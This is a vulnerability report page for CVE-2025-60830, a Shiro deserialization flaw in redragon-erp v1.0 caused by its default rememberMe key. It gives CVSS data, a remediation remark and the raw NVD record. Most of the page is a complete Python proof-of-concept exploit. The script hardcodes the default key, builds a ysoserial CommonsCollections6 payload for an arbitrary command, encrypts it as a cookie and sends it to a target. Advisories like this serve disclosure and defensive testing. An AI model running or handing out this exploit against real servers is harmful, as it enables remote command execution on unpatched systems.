Security Vulnerability Report
CVE-2025-60830 CVSS 6.5 MEDIUM

CVE-2025-60830

Published: 2025-10-08 14:15:46
Last Modified: 2025-10-10 16:17:00

Description

redragon-erp v1.0 was discovered to contain a Shiro deserialization vulnerability caused by the default Shiro key. Because the key protecting the Shiro `rememberMe` cookie is a publicly known default rather than a per-deployment secret, the serialized content inside that cookie cannot be trusted (CWE-502); affected deployments should replace the default key with a randomly generated, deployment-specific one.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:redragon-erp:redragon-erp:1.0:*:*:*:*:*:*:* - VULNERABLE
redragon-erp v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60830 PoC - Shiro Default Key Deserialization Exploit # Affected: redragon-erp v1.0 # Description: Exploit Shiro's default key to perform deserialization attack import requests import base64 from Crypto.Cipher import AES import uuid import subprocess # Apache Shiro default key (publicly known) SHIRO_DEFAULT_KEY = "kPH+bIxk5D2deZiIxcaaaA==" TARGET_URL = "http://target-redragon-erp.com/login" COMMAND = "whoami" def get_ysoserial_payload(gadget, cmd): """Generate payload using ysoserial tool""" # Requires ysoserial.jar to be in the same directory # Usage: java -jar ysoserial.jar CommonsCollections6 "command" try: result = subprocess.run( ['java', '-jar', 'ysoserial.jar', gadget, cmd], capture_output=True ) return result.stdout except Exception as e: print(f"Error generating payload: {e}") return None def aes_encrypt(data, key): """AES-CBC encryption with PKCS5Padding""" # Pad the key to 16 bytes key_bytes = key.encode('utf-8')[:16].ljust(16, b'\x00') # Generate random IV iv = uuid.uuid4().bytes cipher = AES.new(key_bytes, AES.MODE_CBC, iv) # PKCS5Padding pad_len = 16 - (len(data) % 16) padded_data = data + bytes([pad_len] * pad_len) encrypted = cipher.encrypt(padded_data) return iv + encrypted def encode_rememberme(payload): """Encode payload as Shiro RememberMe cookie""" # Step 1: AES encrypt with default key encrypted = aes_encrypt(payload, SHIRO_DEFAULT_KEY) # Step 2: Base64 encode return base64.b64encode(encrypted).decode('utf-8') def exploit(target_url, command): """Execute the Shiro deserialization exploit""" print(f"[*] Target: {target_url}") print(f"[*] Command: {command}") # Generate malicious serialized payload using CommonsCollections gadget print("[*] Generating malicious payload...") payload = get_ysoserial_payload("CommonsCollections6", command) if payload is None: print("[!] Failed to generate payload. 
Make sure ysoserial.jar exists.") return # Encode as RememberMe cookie rememberme = encode_rememberme(payload) print(f"[*] Generated RememberMe cookie: {rememberme[:50]}...") # Send exploit request cookies = {"rememberMe": rememberme} headers = { "User-Agent": "Mozilla/5.0", "Cookie": f"rememberMe={rememberme}" } print("[*] Sending exploit...") try: response = requests.get(target_url, headers=headers, timeout=10) print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print("[+] Exploit may have succeeded!") else: print("[-] Exploit failed.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": exploit(TARGET_URL, COMMAND)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60830", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:45.823", "lastModified": "2025-10-10T16:16:59.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "redragon-erp v1.0 was discovered to contain a Shiro deserialization vulnerability caused by the default Shiro key."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redragon-erp:redragon-erp:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "619140D4-FBC3-4454-AA05-2E8DCCFAE7D1"}]}]}], "references": [{"url": "https://gist.github.com/ChangeYourWay/3b3d3dd5727272c435f1b1f6c17b7181", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Yyjccc/document/blob/main/redragon-erp/redragon-erp.md", "source": "[email protected]", "tags": ["Exploit"]}]}}